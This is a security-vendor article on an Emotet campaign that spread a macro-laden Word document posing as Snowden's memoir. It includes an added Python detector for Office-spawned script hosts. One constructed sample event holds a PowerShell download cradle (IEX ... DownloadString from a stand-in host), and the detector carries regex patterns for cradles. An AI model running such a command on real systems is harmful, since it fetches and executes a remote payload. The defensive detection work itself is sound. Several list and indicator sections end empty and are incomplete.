Emotet (detected by Trend Micro as TrojanSpy.Win32.EMOTET.THIBEAI), which recently resurfaced, has been quick to expand its campaign to bank on the popularity of former CIA contractor and NSA whistleblower Edward Snowden’s bestselling memoir.
The cybercriminals behind this campaign sent out spam emails carrying a Microsoft Word document that pretends to be a free copy of “Permanent Record”, luring victims into opening the malicious document that delivers Emotet, according to a report from Malwarebytes.
This spam campaign had emails in different languages, including English, Italian, Spanish, German and French.
According to security researchers, once victims open the document, a fake pop-up message prompts them to activate Microsoft Word. Clicking the activation button runs the malicious macro code in the background. The macro then triggers a PowerShell command that connects to a compromised WordPress site. From there, Emotet and other malware such as Trickbot are downloaded to the victim’s machine and connect to a command-and-control (C&C) server.
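The chain described above (an Office document whose macro launches PowerShell to fetch a payload from a web server) leaves a distinctive mark in process-creation telemetry: an Office application as the parent of a script host, often with a download cradle on the command line. The following is an added example, not code from the Trend Micro article or from any Trend Micro product: it scans Sysmon-style process-creation events for that parent/child pairing. The event records, the field names (`RecordId`, `ParentImage`, `Image`, `CommandLine`) and the hostname `example.invalid` are constructed for illustration, and the command-line patterns it looks for are assumptions about common cradles rather than anything the article specifies.

```python
"""Flag script hosts spawned by Office applications in process-creation
telemetry. Added example with constructed events; field names follow the
Sysmon Event ID 1 layout but are assumptions, not data from the article."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office parents and script-host children that, paired, warrant a look.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits of download cradles (assumed patterns, not from the article).
NETWORK_HINTS = re.compile(
    r"(https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|-enc\w*\s)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    record_id: int
    parent: str
    child: str
    reason: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events: List[Dict]) -> List[Finding]:
    """Return one Finding per event where an Office app spawned a script host.

    The reason string notes whether the child's command line also shows a
    download cradle, so an analyst can triage the noisier hits first."""
    findings: List[Finding] = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
            continue
        reason = "office application spawned a script host"
        if NETWORK_HINTS.search(ev.get("CommandLine", "")):
            reason += "; command line shows a download cradle"
        findings.append(Finding(ev["RecordId"], parent, child, reason))
    return findings


# Constructed sample events: one benign PowerShell launch, one benign Office
# child process, and two Office-spawned script hosts (one with a cradle).
SAMPLE_EVENTS = [
    {
        "RecordId": 101,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/wp-content/payload')\"",
    },
    {
        "RecordId": 102,
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe Get-ChildItem C:\\Users\\analyst\\Documents",
    },
    {
        "RecordId": 103,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "cmd.exe /c echo activation",
    },
    {
        "RecordId": 104,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\splwow64.exe",
        "CommandLine": "C:\\Windows\\splwow64.exe 12288",
    },
]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"record {finding.record_id}: {finding.parent} -> {finding.child} ({finding.reason})")
```

Run on the constructed events, this reports records 101 and 103 and stays silent on the explorer-launched PowerShell and the printer helper that Word launches legitimately. In a real deployment the same logic maps onto a SIEM rule keyed on parent image and child image, with the cradle check used as a severity booster rather than a prerequisite, since the article notes the macro only needs to run a PowerShell command to reach the staging site.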
In 2014, Trend Micro discovered Emotet as a banking malware that sniffs network traffic to steal data. Over the years, it has evolved. Armed with its own spamming module, Emotet has branched out to different industries and regions all over the world and has acquired sandbox- and analysis-evasion techniques.
In comprehensive research published last year, Trend Micro experts examined how Emotet worked — leading to the discovery of at least two infrastructures running parallel to one another to support its botnet and its possible adoption of multilayer operating mechanisms in the creation of its artifacts.
This resurgent malware family is known for its evolving spam email content and its infectious nature. It does not stop at one infected machine — it can move laterally to other machines connected to the same network.
According to the Department of Homeland Security, because of Emotet’s destructive nature, it can cost state, local, tribal, and territorial (SLTT) governments up to US$1 million per incident to fix.
The best way to remain protected against socially engineered scams is to be well informed of the different ways cybercriminals can trick you.
In this particular spam campaign, social engineering is used to hook users into believing that they’re downloading a free copy of a popular book — only to be infected with Emotet.
These simple steps are key to making sure that you don’t fall for social engineering attacks:
Here are some of the best practices businesses can adopt to protect against Emotet and other threats that may come with it:
Trend Micro endpoint solutions that have behavior monitoring capabilities, like Smart Protection Suites and Worry-Free Business Security, can protect users and businesses from threats like Emotet by detecting malicious files, scripts, and messages as well as blocking all related malicious URLs. Trend Micro™ Apex One™ protection employs a variety of threat detection capabilities, notably behavioral analysis, which protects against malicious scripts, injection, ransomware, and memory and browser attacks.
The Trend Micro Deep Discovery™ solution has a layer for email inspection that can protect enterprises by detecting malicious attachments and URLs. It can detect remote scripts even if they are not downloaded onto the physical endpoints. The Trend Micro Deep Discovery™ Inspector solution protects customers from Emotet via this DDI rule:
Indicators of Compromise
| SHA-256 | Trend Micro Predictive Machine Learning Detection | Trend Micro Pattern Detection |
|---|---|---|
| Malicious Word Document | | |